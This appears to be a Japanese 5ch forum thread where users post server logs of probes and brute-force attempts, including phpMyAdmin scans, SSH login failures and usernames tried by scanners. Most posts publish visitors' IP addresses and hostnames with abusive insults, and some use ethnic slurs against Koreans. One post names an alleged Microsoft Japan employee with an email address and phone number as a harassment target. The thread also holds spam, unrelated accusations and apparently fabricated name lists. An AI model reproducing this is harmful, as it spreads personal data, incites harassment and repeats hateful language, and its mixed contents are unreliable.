- - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:53:20 +0900] "\x16\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:53:21 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x16\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:53:58 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x16\x03\x01" 501 951 "-" "-" 126.9.120.142 - - [10/Feb/2013:23:54:15 +0900] "\x80}\x01\x03\x01" 501 951 "-" "-" softbank126009120142.bbtec.netで検索すると大量に引っかかるから踏み台経由なんだろう 192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD /phpmyadmintting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //phpMyAdmin/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //admin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 192.95.53.131 - - [31/May/2013:17:50:44 +0900] "HEAD //mysql/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD //phpmyadmin2/tting.php HTTP/1.1" 403 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 192.95.53.131 - - [31/May/2013:17:50:45 +0900] "HEAD /epgrec/envSetting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 46.249.33.47 - - [31/May/2013:18:21:29 +0900] "GET /epgrec/systemSetting.php HTTP/1.1" 404 1062 "-" "-" IPアドレス 118.22.250.219 ホスト名 p3219-ipngn1202marunouchi.tokyo.ocn.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 東京都 F5連打やめろカス野郎!! 110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144 110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144 110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144 110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144 110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144 110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144 110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144 110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144 110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "POST / HTTP/1.1" 403 7144 110.89.61.198 - - [07/Aug/20NY:AN:NY.AN +0900] "GET / HTTP/1.1" 403 7144 IPアドレス 219.33.248.7 ホスト名 softbank219033248007.bbtec.net IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 xDSL 都道府県 愛知県 softbank219033248007.bbtec.net /img/ic_p_hand.gif 13/08/167:47 error 403 softbank219033248007.bbtec.net /img/ic_p_hand.gif 13/08/167:47 error 403 softbank219033248007.bbtec.net /img/ic_p_hand.gif 13/08/167:47 error 403 softbank219033248007.bbtec.net /img/ic_p_hand.gif 13/08/167:46 error 403 IPアドレス 103.28.96.56 ホスト名 dhcp38056.orihime.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 該当なし 都道府県 該当なし IPアドレス 61.46.103.148 ホスト名 zaq3d2e6794.zaq.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 CATV 都道府県 大阪府 IPアドレス 123.225.228.170 ホスト名 p3170-ipbf1705sapodori.hokkaido.ocn.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 北海道 27.102.192.140からssh /var/log/auth.log Aug 26 06:24:32 ***** sshd[13852]: Invalid user bart from 27.102.192.140 Aug 26 06:24:32 ***** sshd[13852]: input_userauth_request: invalid user bart [preauth] Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): check pass; user unknown Aug 26 06:24:32 ***** sshd[13852]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=27.102.192.140 Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): getting password (0x00000388) Aug 26 06:24:32 ***** sshd[13852]: pam_winbind(sshd:auth): pam_get_item returned a password Aug 26 06:24:34 ***** sshd[13852]: Failed password for invalid user bart from 27.102.192.140 port 33426 ssh2 Aug 26 06:24:34 ***** sshd[13852]: Received disconnect from 27.102.192.140: 11: Bye Bye [preauth] IPアドレス 111.108.19.55 ホスト名 kd111108019055.ppp-bb.dion.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 栃木県 IPアドレス 223.25.160.33 ホスト名 g1-223-25-160-33.bmobile.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 該当なし 都道府県 該当なし IPアドレス 106.177.13.31 ホスト名 kd106177013031.ppp-bb.dion.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 種別不明 都道府県 該当なし IPアドレス 118.21.111.71 ホスト名 i118-21-111-71.s30.a048.ap.plala.or.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 該当なし KD106177151101.ppp-bb.dion.ne.jp IPアドレス 125.1.164.67 ホスト名 nttkyo455067.tkyo.nt.ngn2.ppp.infoweb.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 東京都 IPアドレス 153.160.118.147 ホスト名 p7147-ipngn4701marunouchi.tokyo.ocn.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 東京都 F5連打キチガイ IPアドレス 220.2.96.8 ホスト名 softbank220002096008.bbtec.net IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 xDSL 都道府県 静岡県 しつけーよカスヤルァー!! 二度と来るなよ!! IPアドレス 106.159.106.72 ホスト名 KD106159106072.ppp-bb.dion.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 種別不明 都道府県 北海道 IPアドレス 58.183.196.116 ホスト名 116.196.183.58.megaegg.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 広島県 F5連打うぜえ IPアドレス 61.193.122.189 ホスト名 flh1adk189.hkd.mesh.ad.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 北海道 IPアドレス 121.84.32.120 ホスト名 121-84-32-120f1.hyg2.eonet.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 兵庫県 消え失せろクズ野郎!! 邪魔なんだよ!! IPアドレス 114.167.56.193 ホスト名 p1193-ipbf2406sapodori.hokkaido.ocn.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 北海道 消え失せろクズ野郎!! 邪魔なんだよ!! IPアドレス 114.20.150.51 ホスト名 KD114020150051.ppp.prin.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 PHS 都道府県 該当なし ブログ荒らしの糞チョン リモートホスト i121-117-132-189.s41.a030.ap.plala.or.jp IPアドレス 121.117.132.189 くだらんクエリ文字列付きでアクセスしてんじゃねーよクズ!! IPアドレス 112.216.76.110 2013年11月08日(金)1時間弱の間にSMTP鯖に5972回不正アクセス ミスって何? ユーザー名とpass ランダムに変えてたから総当たりスクリプトだろ IPアドレス 113.147.246.150 ホスト名 KD113147246150.ppp-bb.dion.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 北海道 くんじゃねーよクズ野郎!! 今日も韓国人を叩く某ブログで ウィルコムプロバイダのチョンが発狂しています いい加減そろそろ通報しようと思う。 2013-11-10 20:35:19 記事 Tomo's Blog ブラウザ Mozilla/3.0(WILLCOM;KYOCERA/WX01K/2;2.0.3.14.000000/1/C256) NetFront/3.4 リモートホスト 114.20.150.165 (KD114020150165.ppp.prin.ne.jp) IP晒します。 IPアドレス 114.20.150.165 ホスト名 KD114020150165.ppp.prin.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 PHS 都道府県 該当なし Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 114.20.128.0/17 b. [ネットワーク名] DP-PACKET2 f. [組織名] 株式会社ウィルコム g. [Organization] WILLCOM, Inc. お前さ、詮索してきてんじゃねーよ!! 2013-11-10 22:45:35 記事 Tomo's Blog ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp) 2013-11-10 22:48:23 記事 Tomo's Blog リファラ 俺の他のサイト ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp) 2013-11-10 22:48:39 記事 ブログ開設しました! ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp) 2013-11-10 22:49:26 記事 Tomo's Blog リファラ http://blog.livedoor.jp/oboega/lite/archives/34528159/comments/7759059/?p=19 ブラウザ Mozilla/5.0 (Linux; U; Android 4.1.2; ja-jp; SH-02E Build/S6210) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 リモートホスト 219.103.115.188 (dhcp-ubr1-0694.csf.ne.jp) 誰が不人気だ、俺のブログはページランク4だぞ なめんじゃねーぞコラ!! >>188 単にSMTPとしか書いて無かったらメール転送のリトライだと思うだろう IPアドレス 162.210.196.165 ホスト名 対応するホスト名がありません。 IPアドレス割当国 アメリカ合衆国 ( us ) 市外局番 該当なし 接続回線 該当なし 都道府県 該当なし 邪魔だよデコスケ IPアドレス 122.18.75.228 ホスト名 p1228-ipbf802sapodori.hokkaido.ocn.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 北海道 邪魔だよデコスケ netstatでよく出てくるgooglebotさん?なのかな TCP <hostname>:2035 nrt04s05-in-f3.1e100.net:http TIME_WAIT 薄気味悪ぃーくらいに出てくる うちは単なるクライアント環境だし外部向けには何も公開していないんだが javascript切ってGoogleにアクセスすると 必ずと言っていいほどにしばらくの間このドメインから訪問を受ける IPアドレス 182.250.240.2 ホスト名 KD182250240002.au-net.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 種別不明 都道府県 該当なし しつけーぞカスヤルァー!! IPアドレス 115.65.5.170 ホスト名 g170.115-65-5.ppp.wakwak.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 青森県 しつけーぞカスヤルァー!! IPアドレス 123.224.187.59 ホスト名 p2059-ipbf4102marunouchi.tokyo.ocn.ne.jp IPアドレス割当国 涛本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 東京都 おまえもだ 邪魔 IPアドレス 119.105.170.249 ホスト名 KD119105170249.ppp-bb.dion.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 東京都 邪魔だよゴミ!! IPアドレス 122.16.37.149 ホスト名 p2149-ipbf1001sapodori.hokkaido.ocn.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 北海道 IPアドレス 126.209.132.45 ホスト名 pw126209132045.4.kyb.panda-world.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 携帯電話 都道府県 該当なし IPアドレス 220.247.10.107 ホスト名 static-220-247-10-107.b-man.svips.gol.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 該当なし しつけーぞカスヤルァー!! アタックとはちょっと違うが 今話題の情報抜き取りサービス百度のクローラーが最悪なので 百度の割り当てIP範囲全てで弾いてる IPアドレス 124.84.37.47 ホスト名 p4047-ipbf504sapodori.hokkaido.ocn.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 北海道 死ねコラゴミクズ!! IPアドレス 219.104.230.145 ホスト名 hmmt105145.catv.ppp.infoweb.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 CATV 都道府県 静岡県 邪魔だよクズ!! IPアドレス 123.198.39.72 ホスト名 p7bc62748.szoknt01.ap.so-net.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 種別不明 都道府県 静岡県 邪魔だよクズ!! IPアドレス 223.218.116.37 ホスト名 i223-218-116-37.s41.a002.ap.plala.or.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 山形県 しつけーぞカスヤルァー!! IPアドレス 61.27.82.154 ホスト名 61-27-82-154.rev.home.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 011 接続回線 CATV 都道府県 北海道 おまえもだ!! IPアドレス 126.121.2.38 ホスト名 softbank126121002038.bbtec.net IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 北海道 ユーザーID # 要注意人物2415[誹謗中傷サイトから来て掘ってくる輩] ホスト名 # i114-180-180-98.s04.a001.ap.plala.or.jp IPアドレス # 114.180.180.98 詮索してくんなよ屑!! IPアドレス 114.176.228.202 ホスト名 p25202-ipngn100401fukuokachu.fukuoka.ocn.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 福岡県 a. [IPネットワークアドレス] 59.86.64.0/18 b. [ネットワーク名] TOKAI-NET f. [組織名] 株式会社TOKAIコミュニケーションズ g. [Organization] TOKAI Communications Corporation m. [管理者連絡窓口] JP00078308 n. [技術連絡担当者] JP00078308 IPアドレス 113.159.230.90 ホスト名 KD113159230090.ppp-bb.dion.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 北海道 またこいつか しつけーぞカスヤルァー!! IPアドレス 113.38.179.234 ホスト名 113x38x179x234.ap113.ftth.ucom.ne.jp IPアドレス割当国 日本 ( jp ) 市外局番 該当なし 接続回線 光 都道府県 該当なし 誤爆とはいえ久しぶりに動いてたので IP: 192.151.148.234 Host: 取得不可 日に数百回トラックバックスパムを試行してくる オー ヤッ! デンデンデデン デンデンデデン デンデンデデン デン デン! えっちぃ絵をリクエストすると誰かが描いてくれるかもしれない素敵なスレ【R-18】 http://hayabusa.o p e n 2ch.net/test/read.cgi/news4vip/1423739321/ アスタリスクハニーポットにて捕獲中 212.83.179.104 195.154.58.164 アスタリスクハニーポットにて捕獲中 85.25.217.111 アタックはないが、プロキシ探しのトラフィックは毎日ある 最近は.eduや上海、シンガポール、フランス辺りが多い 稀に無料クラウドから変なアクセスがある >>229 SOFTLAYERか。 内もプロキシ探しが北。CHINANET-*とHINET 何かもうCnでブロックした方が平和 ちなsshをオープンにしたら、12時間程度でユーザスキャンが来た。 途中からrootクラック開始。 その後、mysql探したりもしていた。 酒を飲みながらボーッとtcpdumpを眺めていたけど、中々勉強になった。 シェアと言うことで、ユーザスキャンに使われた中から幾つかピックアップ 123, 123456, Test, apache1, apache2, bash, boot, cacti, cactiuser, git, jboss, httpd2, httpdocs, java, javaprg, jboss, nagiosadmin, nagiosuser, nginx, r00t, oracle, resin, sysadmin, weblogic, webmail, zabbix とか。 幾つか珍しいユーザ名もあったけど、特定されそうなので割愛。 総括すると機械にやらせるにしても、もう少し工夫が見たかった。 一度試した事を何度も繰り返して、最後は只の帯域飽和攻撃とか眠いわ。 ttp://whatismyipaddress.com/ip/180.18.104.237 いくつかチェックサイト試したけど↑ whatismyipaddress.com が精度よかった 悪質なやつの身元がもっと市区町村までわかる精度のいい解析ねーかな。いずれ出てきそうだろうけど 日本語不自由な特亜詐欺師のログ入れてみた結果。チェックサイトでは所在地和歌山また変えてくるんだろうけど IP: 180.18.104.237 Decimal: 3021105389 Hostname: p9237-ipngn100102wakayama.wakayama.ocn.ne.jp ASN: 4713 ISP: Open Computer Network Organization: Open Computer Network Services: None detected Type: Broadband Assignment: Static IP Blacklist: Blacklist Check Geolocation Information Continent: Asia Country: Japan jp flag State/Region: Wakayama City: Hashimoto Latitude: 34.3167 (34° 19′ 0.12″ N) Longitude: 135.6167 (135° 37′ 0.12″ E) Postal Code: 648-0065 何回アク禁しても来る荒らし p8198-ipngn8701marunouchi.tokyo.ocn.ne.jp Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/3B1817 222.159.86.54 nthygo026054.hygo.nt.ngn.ppp.infoweb.ne.jp 1.33.103.216 pl2008.nas81a.soka.nttpc.ne.jp 210.48.224.81 210.48.224.81.static.zoot.jp 日本マイクロソフト人事部の西川昌邦(さいかわまさくに)は人殺しだ!! 「あなたのような従業員は会社のパフォーマンスにとってマイナスなので早く死んでください」 などと自殺教唆を公然と行った!! 丁寧に言えば何を言ってもいいというものではない!!これはヤクザや借金取りが脅迫をする時に 「いついつまでに金一億円をお振り込みください。間違った判断をなされないことを期待しています」 と発言するのと同じレベルだ!! 「しかもそれを注意してやったら世間はわれわれの味方だ。文句があるなら訴えてきたらよろしい。メールを電番を公開したければ どうぞご自由に。世論はわれわれを賛辞するするメールを送付するだろう」 などとイカ様気取りも大概にしろという発言を行った!! 抗議先 日本マイクロソフト人事本部 西川昌邦 masaikaw@microsoft.com 090-2541-1718 GREE - いろいろ募集中 アクセス ョロシクwww http://gree.jp/32101166 👀 Rock54: Caution(BBR-MD5:a9d7c174ff6545b77b9308db2ce61318) 126.113.224.214 softbank126113224214.biz.bbtec.net アタック反日朝鮮人、通報よろしく softbank126021144028.bbtec.net pw126152034165.10.panda-world.ne.jp pw126245140157.16.panda-world.ne.jp i125-202-241-233.s42.a014.ap.plala.or.jp p1137-ipbfp2603osakakita.osaka.ocn.ne.jp ag220-213-220-206.ccnw.ne.jp IPアドレス 110.67.193.14 ホスト名 p43c10e.gifunt01.ap.so-net.ne.jp IPアドレス割当てエリア 国 日本 都道府県(CF値) 岐阜 ( 95 ) 市区町村(CF値) 岐阜市 ( 55 ) 私は元創価の会員でした。 すぐ隣に防衛省の背広組の官舎があるのですが、 自分の家の窓にUSB接続のwebカメラを貼り付けて、そこの動画を撮影し続け、 学会本部に送っていました。 別に大したものは写っていません。ゴミ出しとか奥さんが子供を遊ばせている所とか。 官舎が老朽化して使われなくなってから、 今まで法人税(うちは自営業です)をほぼ払わなくても済んでいたのが、 もう守ってやれないのでこれからは満額申告するように言われました。 納得がいかないと言うと、君は自業自得で餓鬼地獄へ落ちる、 朝夕南無妙法蓮華経と三千回ずつ唱えて心をきれいにしなさいと言われ 馬鹿らしくなって脱会しました。 それ以来、どこへ行くにもぞろ目ナンバーの車につけまわされたり大変な日々です。 全部自分の出来心から始まった事で、何処に訴えるわけにもいかないのですが、 なんとかあの人たちと縁を切って新しい始まりを迎える方法はないんだろうか。 ホスト:pw126247066015.14.panda-world.ne.jp https://goo.gl/eH1eR4 これ、本当なの?本当だったら、ショックなんだけど、、 アタックNo1を愛する皆様方へお知らせです。 日産自動車栃木工場上三川寮 管理人は合鍵を使い従業員の部屋に無断で侵入。 抜き打ちで従業員の私物を全て調べるブラックの中のブラック企業。 残業賃金一部未払いの最低のクズ会社。 (ガラプー KK9f-DV3b [0681HnY])= (アウアウカー Sa9f-k4J3 [182.250.242.84]) 本日開催した大会の結果を下記に記載します。 新潟県新潟市中央区のカポエイラ大会 1位 栗子椛澄 クリコカスミ 2位 蔵富士桂子 クラフジカツラコ 3位 舘洞希和 タテボラキワ 4位 箭崎梨桜 ヤザキナオ 5位 八木岡琴那 ヤギオカコトナ 6位 馬鳥和名 バトリカズナ 7位 田湖晴仁 タゴハルヒト 8位 蓮舎貴和子 ハスヤキワコ 9位 畠木悟司 ハタキサトシ 10位 呉城志真 クレシロシマ 11位 神後遥太 ジンゴハルタ 12位 谷地館愛里夏 ヤチダテエリカ 13位 白肌あおの シラハダアオノ 14位 畑奈菊絵 ハタナキクエ 15位 暮井絆奈 クレイキズナ 16位 武乗康夏 タケノリコナツ 17位 藏田育枝 クラタイクエ 18位 久留内貴来 クルウチタカラ 19位 舘洞伽奈美 タテボラカナミ 20位 楊井和誉 ヤナイカズヨ 21位 塩飽梢恵 シワクコズエ 22位 八井沢凪乃 ヤイザワナギノ 23位 長田聖康 ナガタキヨヤス 24位 八重原絆 ヤエハラキズナ 25位 安沢悠久 ヤスザワハルヒサ 26位 田合佐佑 タゴウサスケ 27位 安樹恵冬 ヤスキケイト 28位 神恵九兵衛 ジンエキュウベエ 29位 暒田知史 クワタサトシ 30位 嵩里海飛輝 タケザトシブキ 以上です、ご参加ありがとうございました。 すごくおもしろいPCさえあれば幸せ小金持ちになれるノウハウ 一応書いておきます グーグルで検索するといいかも『金持ちになりたい 鎌野介メソッド』 IKPVN 5.51.193.124 174.7.174.119 23.16.129.26 222.67.96.40 112.78.188.204 115.160.170.182 218.161.64.154 1.34.204.30 212.170.53.128 80.55.96.21 78.41.83.106 76.115.220.96 151.84.205.59 106.69.254.27 211.186.252.152 109.86.218.241 24.247.245.17 221.168.134.3 180.43.110.159 202.70.37.224 85.113.171.3 121.6.171.173 24.21.165.233 94.92.50.241 49.231.15.98 93.224.100.183 46.165.69.136 112.78.188.204 98.51.172.26 77.149.211.130 118.236.32.21 184.177.155.102 24.130.76.202 82.127.167.237 195.116.75.56 178.13.90.233 144.64.36.42 66.66.86.20 113.186.94.244 155.93.183.9 47.53.144.122 81.241.56.195 24.157.228.156 103.233.65.210 188.233.238.157 46.33.115.153 183.121.67.22 80.151.199.76 103.233.65.210 61.219.173.185 223.19.38.118 36.91.12.194 218.190.226.227 84.197.140.134 103.224.119.135 31.163.201.82 221.160.254.33 148.75.89.5 202.129.240.25 90.71.72.153 24.247.245.17 24.186.96.66 110.141.246.60 119.194.196.121 94.32.240.52 101.78.169.104 107.184.93.66 223.19.38.118 89.75.176.214 222.128.108.24 183.16.101.180 151.2.171.11 114.32.41.74 220.135.201.122 46.14.11.241 202.31.140.197 118.200.214.177 125.168.46.6 59.127.154.149 218.102.86.36 84.195.21.102 180.70.162.229 42.60.106.6 139.168.163.3 31.163.201.82 144.137.69.160 78.189.212.24 31.163.201.82 118.200.214.177 119.194.196.121 75.156.120.112 93.224.104.105 61.19.255.10 read.cgi ver 07.5.1 2024/04/28 Walang Kapalit ★ | Donguri System Team 5ちゃんねる